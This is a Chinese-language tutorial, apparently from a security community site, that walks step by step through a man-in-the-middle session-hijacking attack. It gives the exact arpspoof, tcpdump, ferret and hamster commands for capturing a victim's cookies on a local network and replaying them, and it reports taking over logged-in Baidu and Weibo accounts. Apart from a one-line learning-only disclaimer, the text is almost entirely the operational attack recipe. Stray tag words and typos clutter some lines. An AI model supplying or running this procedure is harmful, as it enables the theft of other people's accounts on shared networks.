關於中間人攻擊 web
中間人攻擊(Man-in-the-MiddleAttack,簡稱"MITM攻擊")是一種"間接"的入侵攻擊,這種攻擊模式是經過各類技術手段將受入侵者控制的一臺計算機虛擬放置在網絡鏈接中的兩臺通訊計算機之間,這臺計算機就稱爲"中間人"。 瀏覽器
由於FreeBuf幾位前輩已經給出了大量的中間人攻擊的方法,這裏就再也不重複了。剛好看到FreeBuf目前沒有關於中間人攻擊劫持登錄回話的文章,因此就有了下面。 安全
視頻下載地址:http://pan.baidu.com/s/1mgicyt6 提取碼:o1ws cookie
注:本文提供的攻擊測試方法僅供安全學習教學用途,禁止非法使用 網絡
關於抓取cookies的手記tcp
要echo下,實現流量的轉發,要不目標是上不了網的。工具
arpspoof 進行arp欺騙學習
首先抓取包wireshark:選擇本地網卡eth0,star抓取流量。測試
這時候等待用戶登陸,獲取流量信息。獲取成功後保存pacp格式。spa
用ferret加載cookies達到重寫流量信息:命令以下:ferret -r chookies.pacp
重寫以後生產hamster.txt
這時候運行hamster重放流量,而後代理hettp剩下 的我就很少說了
user。qonze你懂得
0×00
用到的工具是arpspoof tcpdump ferret hamster。
arpspoof 進行ARP欺騙
tcpdump抓去打到本地的數據包
Ferret用來處理抓下來的數據包的
Hamster跟ferret配合使用,提供一個web服務來讓咱們交互控制。
0×01
拓撲環境:
攻擊機:Kali 192.168.1.120
受害機:Windows7 192.168.1.100
網關:192.168.1.1
0×02
個人幾個社區賬號都是登陸狀態,固然未登陸也是能夠劫持的
先看下我在Kali的機器上是未登陸的
0×03
開始arp欺騙
命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100
0×04
捕獲數據包
命令:tcpdump -i eth0 -w cookie.cap
0×05
模擬受害者登陸
受害者在受害機器上就隨便刷新一下或者登陸一下
完畢
下面咱們開始重點
0×06
處理抓去的數據包
ferret -r cookie.cap
自動生成了 hamster.txt
0×07
開啓hamster服務
0×08
打開瀏覽器,使用代理
0×09
打開hamster 瀏覽器輸入http://hamster
選擇目標
0x0A
找敏感地址
0x0B
百度劫持成功
微博劫持成功
都成功了
0x0C
我在實驗的時候遇見一個問題,就是忽然上不到網
下面教你們解決
編輯/etc/NetworkManager/NetworkManager.conf
vi /etc/NetworkManager/NetworkManager.conf
改爲true後保存
service network-manager restart
重啓服務